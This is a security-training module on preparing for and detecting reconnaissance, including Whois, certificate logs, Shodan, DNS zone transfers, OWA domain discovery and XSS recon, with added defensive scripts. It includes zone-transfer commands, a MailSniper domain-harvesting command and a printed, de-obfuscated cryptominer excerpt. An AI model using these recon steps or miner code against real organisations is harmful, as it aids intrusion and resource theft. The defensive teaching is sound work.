
Preparing & Defending Against Reconnaissance & Information Gathering

Section 03 | Module 01
© Caendra Inc. 2019
All Rights Reserved
Table of Contents

Module 01 | Preparing & Defending Against Reconnaissance & Information Gathering

1.1 Reconnaissance/Information Gathering: Definition
1.2 Reconnaissance Techniques & Defense
IHRPv1 - Caendra Inc. © 2019 | p.2


Learning Objectives

By the end of this module, you should have a better understanding of:

✓ The reconnaissance/information gathering techniques used by attackers
✓ How to prepare and defend against reconnaissance/information gathering activities


1.1 Reconnaissance / Information Gathering: Definition


1.1 Reconnaissance/Information Gathering: Definition

At the end of the Incident Handling Process module we mentioned that we will cover how to prepare and defend against all phases of the cyber kill chain.

That being said, the cyber kill chain can be a little confusing for newcomers, so we will group attacker actions as follows.

[Figure: attacker actions grouped into four numbered phases, one of them labeled Scanning]

https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html


1.1 Reconnaissance/Information Gathering: Definition

As you can imagine, even inexperienced attackers will not start throwing exploits against your external or internal assets before they gather as much information as possible about your network.

It is a known fact that a well-prepared attack is most likely to result in a breach.


1.1 Reconnaissance/Information Gathering: Definition

Unfortunately, the Internet contains massive volumes of information about organizations and their employees. Prior to an attack, malicious actors thoroughly collect (and analyze) such information from multiple open sources, in order to maximize the chances of a successful breach.


1.1 Reconnaissance/Information Gathering: Definition

The collection (and analysis) of information from open sources about an organization and its employees prior to an attack is known as “The Reconnaissance / Information Gathering Phase”.

From here on we will refer to The Reconnaissance / Information Gathering Phase as Reconnaissance.


1.1 Reconnaissance/Information Gathering: Definition

Let’s now cover the most common reconnaissance techniques used by attackers and see how we can prepare and defend against them.


1.2 Reconnaissance Techniques & Defense


1.2 Reconnaissance Techniques & Defense

Let’s cover the reconnaissance activities that can be performed by attackers residing outside your network. Specifically, we’ll cover the following reconnaissance techniques:

• Whois information analysis
• SSL certificate information analysis
• Utilization of search engines, internet-wide scanners & other sites
• DNS interrogation
• Abusing exposed OWA
• JavaScript injection
1.2.1 Whois information analysis

Whenever a domain name is registered, information such as postal addresses, phone numbers, contact names and authoritative domain name servers is requested by the registrar.

This information can be the starting point of attacks such as social engineering, war dialing, war driving and network mapping.

https://www.optiv.com/blog/war-dialing-part-1-the-voip-and-analog-primer
https://kismac-ng.org/what-is-wardriving/
1.2.1 Whois information analysis

Unfortunately, this information can be retrieved from open sources. Specifically, Whois databases exist throughout the internet exposing all the records that were filled in during a domain name’s registration.

An example of such a database is https://whois.icann.org/en


1.2.1 Whois information analysis

You can use publicly available Whois databases or the whois Linux command to see the information that your organization is exposing.

https://www.unix.com/man-page/linux/1/whois/


1.2.1 Whois information analysis

Preparation & Defense

You can’t tell when someone is looking at your organization’s Whois information, but you can be proactive by closely monitoring the submitted contact email and DNS server(s).

You can also defend against ill-intended Whois lookups by purchasing a Whois privacy service that many registrars offer. On your right you can see an example of such a service.


1.2.1 Whois information analysis

Looking up and analyzing Whois information is a reconnaissance technique that does not involve even a single packet being sent from the attacker to the targeted organization’s network. Such reconnaissance is known as passive reconnaissance.

Passive reconnaissance techniques are particularly interesting due to the fact that they cannot be detected.


1.2.2 SSL certificate information analysis

Another passive reconnaissance technique you should be aware of is gathering and analyzing SSL certificate information.

By analyzing an SSL certificate an attacker can:

• Sketch a picture of an organization’s network layout (by checking the subdomains that could appear in the CNs)
• Identify provided services (by analyzing the subdomain names)
• Identify critical assets (critical assets are always SSL-protected)
• Identify internal host names, IPs or alternative DNS servers


1.2.2 SSL certificate information analysis

You should also know about the Certificate Transparency initiative. This initiative enables detecting SSL certificates that have been mistakenly issued by a certificate authority or have been maliciously acquired. It also makes it possible to identify certificate authorities that have gone rogue and are maliciously issuing certificates.

https://www.certificate-transparency.org/


1.2.2 SSL certificate information analysis

Why are we mentioning the Certificate Transparency initiative, you may ask?

In the past, SSL certificate information was still publicly available through published results of internet-wide scans. Obviously, internet-wide scans could only catalog SSL certificate information of publicly reachable web sites. What Certificate Transparency could accidentally bring to light are names intended for internal use only.

https://scans.io/


1.2.2 SSL certificate information analysis

Find below an example of passive subdomain enumeration by analyzing SSL certificate information. By checking each of those entries, one could also identify host names of intranet machines.


1.2.2 SSL certificate information analysis

Preparation & Defense

Once again, you can’t tell when someone is going through your organization’s SSL certificate information.

You can be proactive though, by requesting and analyzing all the information included in your organization’s SSL certificates.

In addition, a great example of how you can check for sensitive information inside your organization’s SSL certificates from an attacker’s perspective is Censys.

https://censys.io/certificates?q=


1.2.2 SSL certificate information analysis

Preparation & Defense

Other publicly available sources to passively gather and analyze SSL certificate information are:
• https://crt.sh/
• https://developers.facebook.com/tools/ct/
• https://www.google.com/transparencyreport/https/ct/
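As an added example (not part of the course material), the following Python script audits what Certificate Transparency logs already reveal about a domain, the way a defender reviewing the sources above would: it takes crt.sh-style JSON (constructed inline here, not fetched), deduplicates the logged names, buckets them by exposure (internal namespaces, wildcards, labels that hint at a sensitive service) and flags issuers outside the CAs the organization actually uses. The example.com names, the naming heuristics and the expected-CA list are assumptions to adapt to your own environment.

```python
import json
import re
from collections import defaultdict

# Constructed sample in the shape of crt.sh's JSON output
# (https://crt.sh/?q=%25.example.com&output=json). Names, dates and
# issuers are made up for this example.
SAMPLE_CT_JSON = json.dumps([
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "not_after": "2020-01-01T00:00:00",
     "name_value": "www.example.com\nexample.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "not_after": "2020-02-01T00:00:00",
     "name_value": "vpn.example.com\ndc01.corp.example.com"},
    {"issuer_name": "C=US, O=Let's Encrypt, CN=R3", "not_after": "2021-01-01T00:00:00",
     "name_value": "exch01.example.local\nowa.example.com"},
    {"issuer_name": "C=US, O=DigiCert Inc, CN=DigiCert SHA2 Secure Server CA",
     "not_after": "2020-03-01T00:00:00",
     "name_value": "*.example.com\nstaging-db.example.com"},
])

# Heuristics for names that were probably never meant to be public.
# These are assumptions for the example; adapt them to your naming scheme.
INTERNAL_TLDS = (".local", ".internal", ".lan", ".corp", ".intranet")
INTERNAL_LABELS = (".corp.", ".internal.", ".intranet.")
SENSITIVE_LABEL = re.compile(
    r"(^|[.-])(dc|exch|owa|vpn|staging|db|test|dev|sql)\d*([.-]|$)")


def extract_names(ct_json):
    """Deduplicated, lower-cased DNS names across all logged certificates."""
    names = set()
    for entry in json.loads(ct_json):
        for name in entry["name_value"].split("\n"):
            name = name.strip().lower()
            if name:
                names.add(name)
    return names


def classify(names):
    """Bucket names by the kind of exposure a reviewer should look at first."""
    buckets = defaultdict(list)
    for name in sorted(names):
        if name.endswith(INTERNAL_TLDS) or any(l in name for l in INTERNAL_LABELS):
            buckets["internal_namespace"].append(name)   # never meant for the internet
        elif name.startswith("*."):
            buckets["wildcard"].append(name)             # hides hosts, but covers any host
        elif SENSITIVE_LABEL.search(name):
            buckets["sensitive_label"].append(name)      # service or role visible in the name
        else:
            buckets["public"].append(name)
    return dict(buckets)


def unexpected_issuers(ct_json, expected_ca_substrings):
    """Issuers matching none of the CAs you use: candidates for mis-issuance review."""
    return {e["issuer_name"] for e in json.loads(ct_json)
            if not any(s in e["issuer_name"] for s in expected_ca_substrings)}


if __name__ == "__main__":
    found = extract_names(SAMPLE_CT_JSON)
    for bucket, items in classify(found).items():
        print(bucket, items)
    print("unexpected issuers:", unexpected_issuers(SAMPLE_CT_JSON, {"Let's Encrypt"}))
```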


1.2.3 Utilization of search engines, internet-wide scanners & other sites

To conclude covering the passive reconnaissance techniques being used by attackers, let’s see how they leverage search engines, internet-wide scanners & other sites to gather critical information about an organization.


1.2.3 Utilization of search engines, internet-wide scanners & other sites

Let’s start with search engines. Attackers leverage the extended visibility and features of search engines to perform passive reconnaissance activities.

Specifically, they are leveraging search engine directives and operators for targeted searches. What they also leverage is the cache functionality to retrieve deleted information.


1.2.3 Utilization of search engines, internet-wide scanners & other sites

Preparation & Defense

Similarly to the other passive reconnaissance techniques, you can’t detect an attacker searching for information about your organization through search engines. What you can do though, is mimic the way attackers use search engines for reconnaissance purposes to identify critical information that your organization may be exposing.

Find below a great resource on how to do so.

http://www.mrjoeyjohnson.com/Google.Hacking.Filters.pdf
1.2.3 Utilization of search engines, internet-wide scanners & other sites

Preparation & Defense

What you can also do, is minimize the information your organization is exposing through search engines. You can refer to the following resources on how to do so.
• http://web.archive.org/web/20050830204837/google.com/remove.html
• https://support.google.com/webmasters/answer/1663419?hl=en
1.2.3 Utilization of search engines, internet-wide scanners & other sites

Preparation & Defense

Notes:
1. Instead of the cache functionality of search engines, attackers are also known to use http://web.archive.org/
2. Some of the directives that you saw in the Google hacking resource also apply to other search engines
3. Automated penetration testing tools that leverage search engines for reconnaissance are Recon-ng and SearchDiggity

https://bitbucket.org/LaNMaSteR53/recon-ng
https://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/
1.2.3 Utilization of search engines, internet-wide scanners & other sites

Internet-wide “scanners” like Shodan or Censys are also heavily utilized by attackers. Such services scan the whole internet and can provide attackers with critical information about an organization’s IP blocks, exposed services/web servers (including their version), utilized technology etc.

Armed with such knowledge attackers can passively identify vulnerable systems exposed on the internet.

https://www.shodan.io/


1.2.3 Utilization of search engines, internet-wide scanners & other sites

A nice example of Shodan usage is the below:
https://searchnetworking.techtarget.com/tip/How-to-use-Shodan-search-engine-to-diagnose-vulnerabilities

Shodan’s REST API documentation contains all the information you will need to construct more advanced / targeted queries:
https://developer.shodan.io/api
1.2.3 Utilization of search engines, internet-wide scanners & other sites

Preparation & Defense

The solution to prepare and defend against internet-wide “scanners” is, once again, to proactively check for critical information being exposed by them and also limit the amount of information being exposed.


1.2.3 Utilization of search engines, internet-wide scanners & other sites

There is no doubt that phishing remains the top threat vector for cyber attacks. Attacking the human factor continues to be the most attractive and successful path for gaining an initial foothold.


1.2.3 Utilization of search engines, internet-wide scanners & other sites

A successful phishing attack requires a target and a good social engineering pretext. Both can unfortunately be obtained through open sources.


1.2.3 Utilization of search engines, internet-wide scanners & other sites

Your organization’s own website may include employee information (including e-mail addresses). Even if it doesn’t, an organization’s employees and their day to day activities can be identified through networking sites such as LinkedIn, Facebook, Twitter etc., or databases like pipl.com.


1.2.3 Utilization of search engines, internet-wide scanners & other sites

Preparation & Defense

There is little you can do about employees sharing their company position or whereabouts. You could try enforcing a stricter information sharing policy and educate them on social engineering and the dangers of phishing attacks.


1.2.4 DNS interrogation

The Domain Name System can provide useful information about an organization. Most of the time attackers will try to dump all records from a DNS server through zone transfers. This way, they can identify internet-reachable machines.


1.2.4 DNS interrogation

Preparation & Defense

To prepare against DNS-based reconnaissance you can:

• Configure the primary DNS server so that it accepts zone requests by secondary and tertiary DNS servers only
• Use split DNS
• Thoroughly harden every DNS server
• Proactively attempt a zone transfer
  o dig @[DNS_server_IP] [target_domain] -t AXFR
  o nslookup
    > server [authoritative_server_IP_or_name]
    > set type=any
    > ls -d [target_domain]
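The first bullet above as an added configuration example (not from the course material): a BIND named.conf fragment with the weak setting beside the corrected one. The zone name, addresses and key name are placeholders; the corrected zone requires both a listed secondary address and a valid TSIG signature before it serves AXFR.

```conf
# Weak: any client on the internet may request the whole zone.
zone "example.com" {
    type master;
    file "/var/named/example.com.zone";
    allow-transfer { any; };
};

# Corrected: refuse transfers globally, then allow them per zone only to the
# secondary/tertiary servers AND only when the request is TSIG-signed, so a
# spoofed source address alone is not enough.
options {
    allow-transfer { none; };
};

key "xfer-key" {
    algorithm hmac-sha256;
    secret "<base64 secret from tsig-keygen, placeholder>";
};

acl "secondaries" { 192.0.2.53; 198.51.100.53; };

zone "example.com" {
    type master;
    file "/var/named/example.com.zone";
    # "!{ !secondaries; any; }" rejects every address outside the ACL first;
    # what remains must also present the key.
    allow-transfer { !{ !secondaries; any; }; key "xfer-key"; };
    also-notify { 192.0.2.53; 198.51.100.53; };
};
```

After reloading, the proactive check from the last bullet (dig ... -t AXFR from an address outside the ACL) should come back with "Transfer failed." rather than the zone contents.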
1.2.4 DNS interrogation

Preparation & Defense

As for detecting DNS-based reconnaissance, we have already covered what zone transfers look like on the wire in Section 1.


1.2.5 Abusing exposed OWA

Let’s continue with active reconnaissance, starting with abusing an exposed Outlook Web Access (or App) service, to perform domain name discovery.

Specifically, attackers can remotely identify an organization’s Active Directory domain name by:
1. Leveraging known OWA inconsistencies in terms of response times
2. Leveraging a by-design NTLM over HTTP authentication inefficiency


1.2.5 Abusing exposed OWA

Knowing the Active Directory domain name is critical for attackers, since based on it they can launch password spraying* attacks, to identify valid credentials.

* Password spraying is brute-forcing an authentication mechanism by trying different usernames but the same password in each attempt. This way attackers avoid locking accounts and subsequently being detected.


1.2.5 Abusing exposed OWA

1. Leveraging known OWA inconsistencies in terms of response times

If one tries to authenticate with an invalid domain and an arbitrary username, the response time is going to be predictably shorter than the one regarding a request with a valid internal domain name and an arbitrary username.


1.2.5 Abusing exposed OWA

Let’s see this inconsistency in action, using the MailSniper penetration testing tool.

https://github.com/dafthack/MailSniper


1.2.5 Abusing exposed OWA

An attacker will first need a list of random domain names and a list of likely to be valid domain names (so that the baseline response time can be calculated). This can be done with MailSniper as follows.

>> Import-Module .\MailSniper.ps1

>> Invoke-DomainHarvestOWA -ExchHostname mail.domain.com -OutFile potential_domains.txt -CompanyName "Target Name"

See an example of an attacker trying to identify the internal domain name of “ELS Company” on your right.


1.2.5 Abusing exposed OWA

Preparation & Defense

To prepare against such reconnaissance activities, you can make a list of domain names similar to the one of your organization and configure an alert every time an OWA request contains any of the domain names in that list.

You can also introduce a threshold regarding consecutive (or relatively close in terms of time) and unsuccessful OWA login requests and configure an alert every time this threshold is exceeded.
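The two alerts described above, implemented as an added Python example (not from the course or from MailSniper) over a constructed IIS-style log excerpt. It assumes the real domain is ELSCORP, a hand-made lookalike watchlist, and that failed authentication attempts on the Exchange virtual directories are logged with a DOMAIN\user cs-username and a 401 status; the column names are read from the log's own #Fields header rather than hard-coded.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed IIS-style (W3C extended) log excerpt. Only the fields this
# example needs are included; a real IIS log carries more columns, and the
# parser takes the field order from the '#Fields:' header exactly as here.
SAMPLE_LOG = """\
#Fields: date time cs-uri-stem cs-username c-ip sc-status
2019-05-01 10:00:01 /owa/auth.owa ELSCORP\\jdoe 203.0.113.10 302
2019-05-01 10:00:05 /autodiscover/autodiscover.xml ELS\\test 198.51.100.7 401
2019-05-01 10:00:06 /autodiscover/autodiscover.xml ELSCOMPANY\\test 198.51.100.7 401
2019-05-01 10:00:07 /autodiscover/autodiscover.xml ELS-COMPANY\\test 198.51.100.7 401
2019-05-01 10:00:09 /autodiscover/autodiscover.xml ELSCORP\\test 198.51.100.7 401
2019-05-01 10:00:12 /autodiscover/autodiscover.xml ELSCORP\\asmith 198.51.100.7 401
2019-05-01 10:03:30 /owa/auth.owa ELSCORP\\bking 203.0.113.22 302
"""

REAL_DOMAIN = "ELSCORP"                                   # the organisation's AD domain (assumed)
LOOKALIKES = {"ELS", "ELSCOMPANY", "ELS-COMPANY", "ELSCO", "ELS-CORP"}   # watchlist (assumed)
FAIL_THRESHOLD = 4                                        # alert at this many 401s ...
FAIL_WINDOW = timedelta(seconds=30)                       # ... from one source within this window


def parse_w3c(text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            yield dict(zip(fields, line.split()))


def detect(log_text):
    """Return (rule, source_ip, detail, timestamp) tuples for both alert rules."""
    alerts = []
    recent_failures = defaultdict(deque)          # c-ip -> timestamps of recent 401s
    for rec in parse_w3c(log_text):
        ts = datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        domain, _, _user = rec["cs-username"].rpartition("\\")
        domain = domain.upper()
        # Rule 1: a login attempt naming a lookalike of our domain
        if domain in LOOKALIKES:
            alerts.append(("lookalike-domain", rec["c-ip"], domain, ts))
        # Rule 2: a burst of failed authentications from one source address
        if rec["sc-status"] == "401":
            window = recent_failures[rec["c-ip"]]
            window.append(ts)
            while window and ts - window[0] > FAIL_WINDOW:
                window.popleft()                  # forget failures outside the window
            if len(window) == FAIL_THRESHOLD:     # fire once, when the threshold is crossed
                alerts.append(("failed-login-burst", rec["c-ip"], len(window), ts))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```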
1.2.5 Abusing exposed OWA

Preparation & Defense

Note:
A similar inconsistency can be met if someone compares the response times of an OWA request with the correct domain name and a non-existing username and an OWA request with the correct domain name and an existing username.


1.2.5 Abusing exposed OWA

2. Leveraging a by-design NTLM over HTTP authentication inefficiency

By default, OWA installations contain some IIS file paths that support NTLM (NTLM over HTTP). If one sends a specifically crafted authentication request towards any of those IIS file paths, the response will include a Base64-encoded string that contains the Active Directory domain name. This happens not due to a misconfiguration but because of the way NTLM works.

https://docs.microsoft.com/en-us/windows/desktop/secauthn/microsoft-ntlm


1.2.5 Abusing exposed OWA

An attacker will first send a request to an exposed OWA IIS file path that supports NTLM over HTTP (/autodiscover/autodiscover.xml in the example on your right). The Authorization header’s content should be specifically crafted (you can use the header content you see on your right if you want to try this yourself).

The response will include a header named WWW-Authenticate. This header’s content contains a Base64-encoded string.

If the attacker Base64-decodes the abovementioned string he/she will see the Active Directory domain name in clear text (among other information).

[Figure: the request, the WWW-Authenticate response header and the decoded string, with the Active Directory domain name highlighted]
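Added example, not from the course: a Python parser for the CHALLENGE_MESSAGE (NTLM type 2) that the WWW-Authenticate header above carries, so you can see exactly which names your own OWA hands out: the TargetName plus the NetBIOS and DNS domain and host names in the AV_PAIR list, laid out as in MS-NLMP. The message it parses is constructed inside the block (domain and host names are made up); nothing is sent to any server.

```python
import base64
import struct

# AV_PAIR ids from MS-NLMP section 2.2.2.1 (only the string-valued ones)
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName"}
FLAG_UNICODE, FLAG_REQUEST_TARGET = 0x00000001, 0x00000004
FLAG_NTLM, FLAG_TARGET_TYPE_DOMAIN, FLAG_TARGET_INFO = 0x00000200, 0x00010000, 0x00800000


def parse_type2(header_value):
    """Return the names carried in a 'WWW-Authenticate: NTLM <base64>' challenge.

    Raises ValueError if the value is not an NTLM CHALLENGE_MESSAGE (type 2).
    """
    scheme, _, b64 = header_value.strip().partition(" ")
    if scheme.upper() != "NTLM" or not b64:
        raise ValueError("not an NTLM challenge header")
    msg = base64.b64decode(b64)
    if len(msg) < 48 or msg[:8] != b"NTLMSSP\x00" or struct.unpack_from("<I", msg, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    # Fixed part: TargetNameFields @12, NegotiateFlags @20, ServerChallenge @24,
    # Reserved @32, TargetInfoFields @40; each *Fields is (Len, MaxLen, Offset).
    tn_len, _, tn_off = struct.unpack_from("<HHI", msg, 12)
    flags = struct.unpack_from("<I", msg, 20)[0]
    ti_len, _, ti_off = struct.unpack_from("<HHI", msg, 40)
    info = {"flags": flags,
            "TargetName": msg[tn_off:tn_off + tn_len].decode("utf-16-le")}
    pos, end = ti_off, ti_off + ti_len
    while pos + 4 <= end:                         # walk the AV_PAIR list up to MsvAvEOL
        av_id, av_len = struct.unpack_from("<HH", msg, pos)
        pos += 4
        if av_id == 0:
            break
        if av_id in AV_NAMES:
            info[AV_NAMES[av_id]] = msg[pos:pos + av_len].decode("utf-16-le")
        pos += av_len
    return info


def build_sample_type2(nb_domain, nb_host, dns_domain, dns_host):
    """Construct a minimal CHALLENGE_MESSAGE of the kind an Exchange server returns,
    for offline testing only. The server challenge is a fixed constant here."""
    def utf16(s):
        return s.encode("utf-16-le")

    def av_pair(av_id, s):
        value = utf16(s)
        return struct.pack("<HH", av_id, len(value)) + value

    target_name = utf16(nb_domain)
    target_info = (av_pair(2, nb_domain) + av_pair(1, nb_host) + av_pair(4, dns_domain)
                   + av_pair(3, dns_host) + av_pair(5, dns_domain) + struct.pack("<HH", 0, 0))
    flags = FLAG_UNICODE | FLAG_REQUEST_TARGET | FLAG_NTLM | FLAG_TARGET_TYPE_DOMAIN | FLAG_TARGET_INFO
    tn_off = 48                                   # payload starts right after the fixed part
    ti_off = tn_off + len(target_name)
    msg = (b"NTLMSSP\x00" + struct.pack("<I", 2)
           + struct.pack("<HHI", len(target_name), len(target_name), tn_off)
           + struct.pack("<I", flags)
           + bytes.fromhex("0123456789abcdef")    # ServerChallenge (constant for the sample)
           + bytes(8)                             # Reserved
           + struct.pack("<HHI", len(target_info), len(target_info), ti_off)
           + target_name + target_info)
    return "NTLM " + base64.b64encode(msg).decode("ascii")


if __name__ == "__main__":
    sample = build_sample_type2("ELSCORP", "EXCH01", "elscorp.example", "exch01.elscorp.example")
    for key, value in parse_type2(sample).items():
        print(f"{key}: {value}")
```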


1.2.5 Abusing exposed OWA

Preparation & Defense

To prepare against such reconnaissance activities, you can monitor the OWA IIS file paths that support NTLM over HTTP.

Examples:
• /Autodiscover/Autodiscover.xml
• /EWS/Exchange.asmx


1.2.6 JavaScript injection

The final active reconnaissance technique we will cover is reconnaissance through JavaScript injection.

Attackers are known for leveraging Cross-site Scripting vulnerabilities to inject malicious JavaScript code into otherwise benign and trusted websites. While cross-site scripting vulnerabilities are usually leveraged to attack a user’s session, they can also be leveraged for reconnaissance and information gathering purposes.

https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)


1.2.6 JavaScript injection

A nice case to study in order to understand how cross-site scripting vulnerabilities can be leveraged for reconnaissance and information gathering purposes is the Browser Exploitation Framework Project (BeEF). BeEF is a penetration testing tool that heavily utilizes client-side attack vectors.

Specifically, https://github.com/beefproject/beef/wiki/Information-Gathering contains exactly how BeEF utilizes JavaScript code to perform information gathering / reconnaissance.

https://github.com/beefproject/beef


1.2.6 JavaScript injection

Preparation & Defense

An attacker will usually identify a cross-site scripting vulnerability in an organization’s (trusted) website and leverage it in order to inject JavaScript code to gather information. This will be done in the form of a (specifically crafted) URL that will be sent to an intranet user.

As you can imagine, incident responders will be able to retrieve and analyze every piece of JavaScript code that was loaded, if the organization has a traffic capturing capability in place.

Note that oftentimes the injected JavaScript code will be obfuscated to evade detection. De-obfuscation of JavaScript code is usually feasible though.

The image above depicts an example of BeEF’s JavaScript code that tries to identify if Google Desktop is installed on the victim’s machine.


1.2.6 JavaScript injection

Preparation & Defense

Before we conclude this module, let’s see what obfuscated JavaScript code looks like.

Consider the analyze.js file included in this module’s resources.

If you take a quick look at it, you will notice the below.

atob is used in JavaScript to perform Base64-decoding.
1.2.6 JavaScript injection

Preparation & Defense

If we Base64-decode the Base64-encoded string and start analyzing it from the bottom up, we will come across the following pieces of code.

(window));
self[_0x169f('0x98')]=self[_0x169f('0x98')]||{};
self[_0x169f('0x98')][_0x169f('0x4b')]={'LIB_URL':_0x169f('0xb2'),'ASMJS_NAME':_0x169f('0xb3'),'REQUIRES_AUTH':![],'WEBSOCKET_SHARDS':[['wss://wss.rand.com.ru:8843/']],'CAPTCHA_URL':'https://coinhive.com/captcha/','MINER_URL':_0x169f('0xb4'),'AUTH_URL':'https://authedmine.com/authenticate.html'};
some_code[_0x169f('0x57')]=some_code[_0x169f('0x9f')](_0x169f('0xb5'));
var harmless=new some_code['Anonymous'](_0x169f('0xb6'),{'threads':navigator[_0x169f('0xb7')]/0x2});
harmless[_0x169f('0x27')]();

Undoubtedly we are dealing with malicious JavaScript code that is related to crypto-mining.

https://www.fortinet.com/blog/threat-research/the-growing-trend-of-coin-miner-javascript-infection.html
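The de-obfuscation the previous slide calls feasible, as an added Python example (not the course's analyze.js nor its analysis): it unwraps the eval(atob(...)) layer, then statically resolves _0x169f('0xNN')-style string-array lookups like the ones in the excerpt above and lists the URLs that are left in the clear. The obfuscated sample is constructed inside the block and uses a placeholder .invalid hostname rather than the real indicators from the slide.

```python
import base64
import re

# Constructed sample in the style of analyze.js: an eval(atob(...)) layer around
# code that fetches every string through a lookup function over a string array.
# The hostname is a placeholder (.invalid), not a real indicator.
INNER_JS = r"""
var _0x3fa1=['WebSocket','wss://miner.invalid:8843/','threads','hardwareConcurrency','start','Anonymous'];
var _0x169f=function(_0xa,_0xb){_0xa=_0xa-0x0;var _0xc=_0x3fa1[_0xa];return _0xc;};
var harmless=new some_code[_0x169f('0x5')](_0x169f('0x1'),{'threads':navigator[_0x169f('0x3')]/0x2});
harmless[_0x169f('0x4')]();
"""
OUTER_JS = "eval(atob('" + base64.b64encode(INNER_JS.encode()).decode() + "'));"

EVAL_ATOB_RE = re.compile(r"eval\(\s*atob\(\s*'([A-Za-z0-9+/=]+)'\s*\)\s*\)\s*;?")
ARRAY_RE = re.compile(r"var\s+(_0x[0-9a-f]+)\s*=\s*\[([^\]]*)\];")
ITEM_RE = re.compile(r"'((?:[^'\\]|\\.)*)'")
ACCESSOR_RE = re.compile(r"var\s+(_0x[0-9a-f]+)\s*=\s*function\s*\(\s*(\w+)\s*,\s*\w+\s*\)\s*\{"
                         r"\s*\2\s*=\s*\2\s*-\s*(0x[0-9a-f]+)")
URL_RE = re.compile(r"(?:wss?|https?)://[^\s'\"]+")


def unwrap_eval_atob(js):
    """Replace each eval(atob('<b64>')) with the source it would have executed."""
    while True:
        m = EVAL_ATOB_RE.search(js)
        if not m:
            return js
        decoded = base64.b64decode(m.group(1)).decode("utf-8", "replace")
        js = js[:m.start()] + decoded + js[m.end():]


def resolve_string_array(js):
    """Statically replace _0xNAME('0xNN') lookups with the strings they return."""
    arr, acc = ARRAY_RE.search(js), ACCESSOR_RE.search(js)
    if not arr or not acc:
        return js
    strings = ITEM_RE.findall(arr.group(2))
    fn, offset = acc.group(1), int(acc.group(3), 16)      # accessor subtracts this offset
    call_re = re.compile(re.escape(fn) + r"\(\s*'(0x[0-9a-f]+)'\s*\)")
    js = call_re.sub(lambda m: "'" + strings[int(m.group(1), 16) - offset] + "'", js)
    # obj['name'] -> obj.name for readability, then drop the now-dead array/accessor
    js = re.sub(r"\['([A-Za-z_$][\w$]*)'\]", r".\1", js)
    dead = [re.compile(r"var\s+" + re.escape(n) + r"\s*=") for n in (arr.group(1), fn)]
    return "\n".join(line for line in js.splitlines()
                     if line.strip() and not any(d.match(line) for d in dead))


def extract_indicators(js):
    """URLs that are left in the clear once the obfuscation is removed."""
    return sorted(set(URL_RE.findall(js)))


def deobfuscate(js):
    return resolve_string_array(unwrap_eval_atob(js))


if __name__ == "__main__":
    clean = deobfuscate(OUTER_JS)
    print(clean)
    print("indicators:", extract_indicators(clean))
```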


References

cyber kill chain
https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html

war dialing
https://www.optiv.com/blog/war-dialing-part-1-the-voip-and-analog-primer

war driving
https://kismac-ng.org/what-is-wardriving/

ICANN WHOIS
https://whois.icann.org/en

whois
https://www.unix.com/man-page/linux/1/whois/

Certificate Transparency
https://www.certificate-transparency.org/

Internet-wide Scan Data Repository
https://scans.io/

Censys
https://censys.io/certificates?q=

Certificate Search
https://crt.sh/

Facebook for developers
https://developers.facebook.com/tools/ct/

Transparency Report: HTTPS encryption on the web
https://www.google.com/transparencyreport/https/ct

Google Hacking for Penetration Testers
http://www.mrjoeyjohnson.com/Google.Hacking.Filters.pdf

Remove Content from Google’s Index
http://web.archive.org/web/20050830204837/google.com/remove.html

Remove URLs Tool: Temporarily Block Search Results from Sites that you Own
https://support.google.com/webmasters/answer/1663419?hl=en

Internet Archive
http://web.archive.org/

Recon-ng
https://bitbucket.org/LaNMaSteR53/recon-ng

SearchDiggity
https://www.bishopfox.com/resources/tools/google-hacking-diggity/attack-tools/

Shodan
https://www.shodan.io/

How to use Shodan Search Engine to Diagnose Vulnerabilities
https://searchnetworking.techtarget.com/tip/How-to-use-Shodan-search-engine-to-diagnose-vulnerabilities

Shodan Developer: REST API Documentation
https://developer.shodan.io/api

MailSniper
https://github.com/dafthack/MailSniper

NTLM
https://docs.microsoft.com/en-us/windows/desktop/secauthn/microsoft-ntlm

Cross-site Scripting vulnerabilities
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

Browser Exploitation Framework Project
https://github.com/beefproject/beef

beefproject – beef – Information Gathering
https://github.com/beefproject/beef/wiki/Information-Gathering

JavaScript code that is related to crypto-mining
https://www.fortinet.com/blog/threat-research/the-growing-trend-of-coin-miner-javascript-infection.html